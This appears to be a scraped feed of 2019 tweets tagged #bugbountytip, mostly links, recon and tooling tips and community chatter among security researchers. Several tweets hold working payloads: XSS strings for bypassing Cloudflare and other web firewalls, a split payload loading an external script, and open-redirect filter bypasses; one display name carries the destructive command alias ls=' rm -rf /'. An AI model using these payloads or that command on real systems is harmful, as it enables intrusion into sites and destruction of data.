
2019-07-06 18:19:06
1 Server-Side Request Forgery (SSRF) vulnerability on https://t.co/fOlTXYOTDJ: https://t.co/GXSRfRqpAP #BugBountyTip #BugBounty
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 11:16:50
3 [ My Blog Post #01 ] -- Repost , My first blog post . ๐Ÿ’ฐ "Hunt Unvalidated Url Redirects in wildโ€ by Sarvagya Sagar https://t.co/wzsdk1bURQ #BugBountyTip #bugbountytips #BugBounty #infosec #infosec19 #CyberSecurity #infosecurity
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 10:45:25
1 [ #BugBounty #BugBountyTip ] -- ๐Ÿ’ฐ HTTP Parameter Polution Intro : https://t.co/RGUfzyX8ZU Slide : https://t.co/zjSdRsojm4 Writeup : https://t.co/WGU4ctF86X or https://t.co/QC3kdoISbR Report : https://t.co/TIK43b00zX or https://t.co/GsmuDR1DLa ๐ŸŒˆ
alias ls=' rm -rf /'
@spyerror


2019-07-06 10:20:10
0 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-06 00:52:12
1 new links were added to the repository . about OSCP and Advanced google hacking technique and dorks for various attacks. check it out. the number of the links now 1271 and it will get higher everyday. #BugBountyTip #Hacking #infosec #OSINT https://t.co/q2layzVpKz https://t.co/6hsjupaauu
Ammar Amer
@cry__pto


2019-07-05 22:14:51
3 new links were added to the repository . check it out.the number of the links now 1225 and it will get higher everyday. #BugBountyTip #Hacking #infosec #redteam #CyberSecurity #bugbounties https://t.co/q2layzVpKz https://t.co/T0xtpz7hUK
Fisher
@Regala_


2019-07-05 22:00:07
3 https://t.co/iKUQ75PaLI - @ngalongc highlights why you should always read the documentation when hunting on a program. And also kudos for @yaworsk and @ShopifyEng for triaging even being a "hypothetical" #bugbounty #bugbountytip
Sparsh Kulshrestha
@d0tdotslash


2019-07-05 20:10:24
0 @NahamSec @yappare I usually try #BugBountyTip when searching for random tips and tricks.
Mehmet Aura
@rootaura


2019-07-05 19:59:15
0 I released my tool which name is "BountyBot" It checks unclaimed social media accounts which linked on page etc etc. (by the way im new at py) https://t.co/VKBHPVlzcD #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd https://t.co/teDQJ4Kf1h
Jatin
@techyfreakk


2019-07-05 18:25:10
7 For shortening Linux commands, you can use the alias command As an Example, alias nmapq="nmap -Pn -T4 -A" Now just run nmapq $target Add it to /home/user/.bashrc, and you're good to go ๐Ÿ™‚ #linuxtip #bugbountytip
Samet ลžAHฤฐN
@sametsahinnet


2019-07-05 17:42:15
1 How to steal #CSRF Tokens with simple #XSS vulnerability ? https://t.co/140rJjo5Nt #BugBountytip #bugbounty #infosec #hacking #TogetherWeHitHarder
architect
@architectt1


2019-07-05 14:13:30
0 Re-exploited Open Redirect on a private program where I reported that and got a bounty for it not so long ago. Always try other strategies once a report has been resolved. #bugbountytip #bugbounty #infosec #security
CaptainFreak
@0xCaptainFreak


2019-07-05 13:40:52
0 Learn about ZAP @zaproxy from this video if you use Burp extensively and find ZAP UI intimidating. Also the HUD feature๐Ÿ‘Œ, Awesome stuff @Bugcrowd @david_scrobonia https://t.co/nJ1IDtgBWE #bugbountytip
Dhaval Panchal
@cedhaval02


2019-07-05 06:53:04
0 @Divya_Bhaskar Hey, recently i checked out your website and i seen some bugs point that i have attached in below..have a good day to all :) #news #bugbountytip https://t.co/6Iqidefm2y
Sarvagya Sagar
@0ffensivemitthu


2019-07-05 05:58:19
0 [ #BugBounty #bugbountytip ] -- ๐Ÿ’ฐ Open redirects Vedio : https://t.co/kwvNvWlelM or https://t.co/2ggZiuHoN5 Writeup : https://t.co/fbZ4b2H9eu or https://t.co/wzsdk1bURQ Reports : https://t.co/OuP4nBeJOo or https://t.co/mk1I69zu6k Cheatsheet : https://t.co/yQSgrOPjVt ๐ŸŒˆ
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 22:01:43
8 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 21:15:37
0 Cloudflare #XSS #Bypass via dot '"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
vavkamil
@vavkamil


2019-07-04 20:37:31
0 Just launched v1.0 of https://t.co/jZS6PtN22C ~ Latest bug bounty related tweets ~ #bugbountytip
HackIsOn ยฎ
@hackison


2019-07-04 14:58:57
1 โ€œAccount Takeover Using CSRF(json-based)โ€ by shub rathore https://t.co/4Obn65Bode #bugbountytip #bugbounty
Dawood Ikhlaq
@daudmalik06


2019-07-04 13:49:28
1 Just Bypassed Custom Firewall with URL encoding technique: Final Payload: %253%63svg%2520onload=alert(1)%253%65 the firewall was blocking "%253c", Trick: %25 3 %63 -> when the app decoded it, it become %3c -> app decoded it again and it become < and got alert #bugbountytip
$!|3nt_4unt3r
@shub66452


2019-07-04 11:31:04
58 My first blog #bugbounties #bugbountytip https://t.co/scMySo36WD
Neolex
@NeolexSecurity


2019-07-04 10:32:15
0 Hey guys, I have an XSS that works on IE/Edge due to the non-encoding of the url. There is a way to make it work on firefox/chrome ? #bugbounty #bugbountytip
darkmage
@therealdarkmage


2019-07-04 02:16:25
0 TIL that %c2%a0 can be used to overcome XSS defenses. #BugBounty #bugbountytip #bugbountytips
David Alison
@Nokibulislam1


2019-07-04 01:26:22
1 #BugBountyTip: Have a char limit for XSS? See if itโ€™s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: โ€œ><svg/onload=โ€œ$.getScript(โ€˜http://โ€˜+ LastName: โ€˜https://t.co/fSzBPqvWxYโ€™)..โ€ #bugbounty
Arif Khan
@payloadartist


2019-07-03 20:05:26
29 Common Android #security vulnerabilities #bugbounty #bugbountytip https://t.co/ZnNDzj51o9
Petko D. Petkov
@pdp


2019-07-03 17:56:05
1 The real impact of a vulnerability is measured by its potential - not just the current impact but future impact as well. Real attackers can sit on a vulnerability for years. #bugbountytip
Yash Sodha ๐ŸŒŸ
@y_sodha


2019-07-03 17:53:31
13 #BugBountyTip: Always remember to check emails for access control issues. Sometimes the same access control is not applied when sending emails. Thanks @gitlab for the bounty! https://t.co/sqzqBCph6F
Siva krishna
@le4rner


2019-07-03 16:21:43
54 I don't know why and how this bypassed cloudflare. But here it is javascript:{ alert`0` } @rodoassis @s0md3v @akhilreni_hs #bugbountytip #xssbypass PS: Pros are welcome to give your insights about this.
Abugzlife
@abugzlife1


2019-07-03 15:41:43
16 #BugBountyTip: Have a char limit for XSS? See if itโ€™s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: โ€œ><svg/onload=โ€œ$.getScript(โ€˜http://โ€˜+ LastName: โ€˜https://t.co/WKmfmkNmNpโ€™)..โ€ #bugbounty
soaphorn seuo
@soaphornseuo


2019-07-03 10:23:09
5 [ #BugBounty #bugbountytip ] -- Cracking the Lens : Paper : https://t.co/ydXjQUxyVY Video : https://t.co/qerJ8DXT5g or https://t.co/twNLJFmczy Writeup : https://t.co/skBYPKjlUP Report : https://t.co/oblok1GZic
Morphine 'Ashraf'
@m0rph1n3e


2019-07-03 08:47:08
5 #bugbountytip #bugbounty #triagertip #bugbountytips #infosecurity #infosec I've found a reflective xss vulnerability, but it only works in IE, and Edge browser. Any idea, how to exploit it in the other web browsers using HTML file or directly by visiting the vuln endpoint?
Garth Humphreys
@garthhumphreys


2019-07-02 22:48:56
3 I think consistency is important in anything you do, especially with #infosec and #bugbounty - Consistently keep pushing to #learn more and #try harder, even if it's one line of code a day ๐Ÿ™‚ #bugbountytip #bugbountytips
Alejandro Parodi
@SecSignal


2019-07-02 20:04:10
17 #BugBountyTip If you can't use quoted strings in your XSS payload, try to use regex functions that return strings! For example: t.setRequestHeader(([]+/Content-Type/g).substr(1,12),(([]+/application/g).substr(1,12)+([]+/json/g).substr(1,4)) Also, + can be %2b ;) #WAF #BugBounty
Fisher
@Regala_


2019-07-02 17:01:51
12 Ayyyy! Got featured on the latest hacking newsletter by @PentesterLand ๐Ÿฅณ Have a look and show some love, this person has been doing an amazing job on collecting, sharing resources and putting content out there for all BB fellows โค๏ธ #bugbounty #bugbountytip https://t.co/NEcoXNaZSL
Cade
@persian_mh17


2019-07-02 15:36:02
4 Enumerate websites that are accessible through HTTP/HTTPS (Specifically), in other words it can identify live websites for further testings #recon #bugbountytip https://t.co/LwB0soe7Y7
eForensics Magazine
@eForensics_Mag


2019-07-02 14:43:00
6 Bug Bounty Methodology (TTP- Tactics,Techniques and Procedures) V 2.0 | By Sanyam Chawla https://t.co/IF6mmn6OcE #bugbounty #bugbountyhunter #bugbountytip #bugbountyhunting #cybersecurity #digitalforensics
Ismail Tasdelen
@ismailtsdln


2019-07-02 04:23:11
5 If you have a web subdomain list in your hand and you want to capture them. A app that may be useful to you. ๐Ÿ˜Žย --> https://t.co/XAqQJ91Tck #bugbountytip #bugbounty #websecurity
Fisher
@Regala_


2019-07-01 15:07:40
2 Did you know... triagers try to escalate your reports before handing them to the company? ๐Ÿ˜ณ๐Ÿ’ฐ Show some love for them ๐Ÿ˜ #bugbounty #triagertip #bugbountytip
[email protected]
@k3va1


2019-07-01 14:01:55
5 #bugbountytip When you get path from where files are downloading remove file from url and run dirsearch with @Jhaddix's all.txt you will get juicy info๐Ÿ˜
Petko D. Petkov
@pdp


2019-07-01 09:53:46
1 This new tool allows you to discover secrets at hyper-scale. #bugbountytip #bugbountytips #cloudflare https://t.co/jXFuNyxVlK
SaadAhmed
@XSaadAhmedX


2019-07-01 08:15:27
88 Here the write-up of IDOR ๐Ÿง https://t.co/3haNz2hZfa #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 08:10:32
28 [ #bugbountytip ] Open Redirection : If https:// are blacklisted then Try Japanese Punctuation Symbols like ใ€ฑ, ใƒผ , ใ‚ , ใ€ต , ใ€ฝ , ใ€ณ etc Example : ใ‚google%2Ecom /ใ‚google%2Ecom - Also try Unicode of these Symbols . #BugBounty #CyberSecurity #bugbountytips #infosec #infosec19
Petko D. Petkov
@pdp


2019-07-01 07:44:10
1 What is your average severity level? #bugbountytip #bugbountytips
Ameen
@ameenmaali


2019-07-01 07:15:41
1 #BugBountyTip: Take a break/relax every so often! After trying to learn too aggressively for 5 months straight, I got burnt out and submitted nearly nothing for a month+, going from my best to worst month. Iโ€™m feeling much better and ready to get back to it now in a relaxed pace https://t.co/IO7OoP88qf
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 00:20:12
2 - #bugbountytip #0xWilt What I Learned Today #03 : Open Redirection : If domain name is blacklisted , then try IP Address in Canonical notation , Decimal , hex or octal notation to bypass blacklisted domain . #bugbountytips
Garth Humphreys
@garthhumphreys


2019-06-30 23:36:56
2 So basically... the #recon phase never ends. Keep digging for more info #bugbounty #bugbountytip #hacking #infosec
แด‚
@pouyana1


2019-06-30 20:57:45
2 enumerating exchange users through outlook web login page: invalid users have longer response time than valid users, an attacker can use this feature to enumerate a list of users, valid users response in lesser time than invalid user. #bugbountytip #infosec #hacking #hack
Petko D. Petkov
@pdp


2019-06-30 20:15:59
4 Tracking 197 bug bounty programs like a pro. I don't know about your shell scripts but this thing is hot. #bugbountytip https://t.co/WA5AznSIyr
Nikos Gkogkos
@ngkogkos


2019-06-30 20:12:42
16 Do you have a big list of URLs & want to fuzz them for XSS in the URL path? Use @TomNomNom's meg tool! 1. Add /?xss=xss1"2<3%22' in paths.txt 2. meg -L -c 5 paths.txt urls.txt ./megxss_out 3. grep -HC5 'xss1"' --color ./megxss_out/*/* #bugbounty #bugbountytip #pentest #infosec
Mhamed Kchikech
@mhamed_kchikech


2019-06-30 17:23:38
1 @SecuAudit @Hacker0x01 It's more like a #BugBountyTip
Sarvagya Sagar
@0ffensivemitthu


2019-06-30 15:15:08
13 What I learned Today : My Daily dose of progress thread. In this thread I will post whatever I learn, read or watch related to #infosec , #BugBounty , #bugbountytip , #Hacking, #CyberSecurity, #OSINT .Make sure to follow it to get regular quality content. Retweet to invite others
Fisher
@Regala_


2019-06-30 09:58:54
6 It's always good fun to hang out with @stokfredrik, shooting this video only felt natural ๐Ÿ™๐Ÿ™๐Ÿ™ #bugbounty #bugbountytip https://t.co/8MHud7mIeX
n a f f y
@nnwakelam


2019-06-30 09:33:02
20 Learn to fuzz all available inputs and start inferring things based upon what you are being returned #bugbountytip
Navneet
@na5n33t


2019-06-30 08:32:52
4 CSRF token was absent in POST request but value of parameter wishlistID is unique and not known to attacker can protect it from CSRF. Tried to submit it with blank value and successfully able to perform CSRF. Waiting for reply of team. #bugbountytip #hackerone #bugcrowd #infosec
Ashraf .G.
@U2w0k


2019-06-29 22:17:41
5 Got an XSS vulnerability but the domain is behind the annoying CloudFlare WAF .. couldn't get the original IP of the domain and couldn't bypass it neither. any suggestions? #BugBounty #togetherwehitharder #bugbountytip
Ammar Amer
@cry__pto


2019-06-29 21:08:52
5 surprise! all the links that i am sharing on my GitHub repository . been stored on my PC hard drive as a PDF files,there is more than 1,300 article as a PDF files,i am gonna share these file also on my GitHub repository. #Hacking #BugBounty #infosec #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-06-29 19:33:23
168 BugBountyTip: If you playing with `API ENDPOINT` always try to send `INVALID CONTENT TYPE` end-up by getting hidden endpoints in `RESPONSE` #bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH
Yadhavi
@PrincessYadhavi


2019-06-29 18:12:36
1 I tried to scan a target with masscan, the input file has 522 hosts but masscan only scan 438 hosts. why?strange! PS: ( --rate=500) #masscan #bugbounty #bugbountytip #bugbountyhelp
Michael Blake
@Michael1026H1


2019-06-29 17:23:46
6 #bugbountytip The Burp extension Scan Check Builder is fantastic. You can build your own scan checks. Personally, I use this to passively detect and report things like URLs as parameter values and suspicious parameter names for manual testing.
iNoSec
@IsecEmAll


2019-06-29 10:28:43
1 If some bug Bounty hunter are against sharing their tools, because they Can lose some bounties, what do we think when they share others tools on twitter?? Rabbit hole or that's because that's not their own tools?? #bugbountytips #bugbountytip
CryptoCris
@cryptocris88


2019-06-28 16:44:48
9 Dev Update 2 - June We will challenge our dev community to find bugs with our Bug Bounty Program to win rewards up to $5,000. More information later. Also: dApp competition soon! https://t.co/crInkoRQNV #blockchain #bugbounty #bugbountytip #developers #gamedeveloper
Rรฉgis Deldicque
@RegisDeldicque


2019-06-28 13:17:31
1 #bugbounty #Bugbountytip #Hacking I wish to compare technical mechanisms in order to protect http flows. In the diagram below, I used a cost/complexity representation. Does it seem to you correct ? https://t.co/N0AWz0uVNW
Ali ร‡elebi
@_alicelebi


2019-06-28 06:26:32
3 Has anyone had successful stored XSS on Angular app recently? Would you mind sharing the payload? #BugBountyTip #bugbounty
m0z
@LooseSecurity


2019-06-27 23:48:12
6 Everytime I tell someone I'm a hacker. ๐Ÿ˜‚ https://t.co/2k2YRO1wIY #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
detroitsmash and 22 others
@detroitsmassh


2019-06-27 21:39:19
7 If you are using burpโ€™s match&replace feature for spoofing cors origin then changed it with something: https://t.co/FUG19N5qeS instead of default one. Coz developers mostly forgets to escape dot with \. in their regex #bugbountytip
1984isnow๐Ÿ“–
@_gonzacabrera


2019-06-27 19:00:49
1 Me downloading Burp Suite Professional cracked. #Infosec #BugBounty #BugBountyTip #ProTip #VolveCristina https://t.co/VvJQHNXak5
C1h2e1
@C1h2e11


2019-06-27 15:50:39
4 https://t.co/cJ8kHgdWmM make your recon more fast and more easy #BugBountyTip #bugbounty #bugbountytips https://t.co/vr7ilRtyAc
Malav Sharma (Wolfdroid)
@ShMalav


2019-06-27 08:23:11
8 one liner to replace one word to another in a file in vim :%s/old_word/new_word/g this will replace the old word from all lines if present to new word .. #bugbountytips #bugbountytip
Osama Avvan
@osamaavvan


2019-06-27 06:11:10
39 A writeup about CORS TO CSRF @Bugcrowd #BugBounty #bugbountytip https://t.co/7oeic4UuA3
David Alison
@Nokibulislam1


2019-06-26 15:32:28
0 Open Redirect : If http:// is blacklisted then try to Play with (Forward/Backward) Slash , browsers act as // Ex: //google%2Ecom ; /\google%2Ecom ; \/google.com ; /\/\google%2Ecom ; \/\google%2Ecom ; \/\/google.com ; #BugBounty #bugbountytip #infosec19 #infosec #cybersecurity
mAshraf
@mAshraf9_


2019-06-26 15:10:16
0 A security engineer's strength lies not in his skills or in the number of ZERO day of attacks he knows, but in the intensity of his understanding about security issue. #bugbountytip #bugbounty #bugbountyquote
Akshay Kumar Malhi
@Kumar_Akkiy


2019-06-26 10:06:18
0 Guys I got private invitation program from #hackerone, after getting 26 points on hackerone CTF program, so I need your feedback on private invitation programs. @KHIZER_JAVED47 @PratikY9967 @D0rkerDevil @AliRazzaq_ Thanks ๐Ÿ™ #BugBounty #bugbountytip #togetherwehitharder
๐Ÿ•‹ wareeq shile๐Ÿ‘จ๐Ÿพโ€๐Ÿ’ป
@wareeq_shile


2019-06-25 18:56:13
11 For monitoring js files https://t.co/93m2ozPlqe. Thanks for sharing @Mahmoud0x00 #bugbountytips #bugbounty #bugbountytip #BugBounty
Fisher
@Regala_


2019-06-25 18:39:36
3 ๐ŸงWhen writing a report involving different user roles, if possible, include your own testing credentials so it's easier for the team to validate. Happy triager = happy hacker ๐Ÿฅณ #bugbounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-06-25 14:48:52
43 Open Redirection -- You can use Chineese Separator "ใ€‚" (%E3%80%82) instead of dot "." (%2E) when dot is blacklisted ... Example : target%2Ecom/reset-pass/users-token?go=google%E3%80%82com #bugbounty #bugbountytips #bugbountytip #Infosec #infosec19 #vulnerability #CyberSecurity
Broly
@Broly157


2019-06-25 14:37:26
0 @fuomag9 hey brother congrats for your 1st bug bounty. Can u give me some #bugbountytip.?? Plzz. I'm still studying various articles.
Thibeault
@thibeault_chenu


2019-06-25 11:49:06
2 @intigriti In the case of an e-commerce site, try to multiply the quantity by a value close to 0 (0.00008.....) this can allow you to get items for free. Tested at a food delivery site recently ๐Ÿ‘‡ #BugBounty #BugBountyTip #HackWithIntigriti https://t.co/AzemqbmH2I
plenum ๐Ÿ‡น๐Ÿ‡ณ
@plenumlab


2019-06-25 11:16:20
24 Bash oneliner: - remove trailing characters/dots from large file cat myfile | while read i; do echo "${i%.}"; done - remove characters/dots from beginning of line cat myfile | while read i; do echo "${i#.}"; done Replace the . with anything you want #BugBounty #bugbountytip
0xd0m7
@0xd0m7


2019-06-25 09:14:21
37 #bugbountytip if you find a file like that "rest/v1/ swagger.json" it might be interesting to use the OpenAPI Parser BurpSuite plugin to do a quick job ;) https://t.co/PcAmOLRgai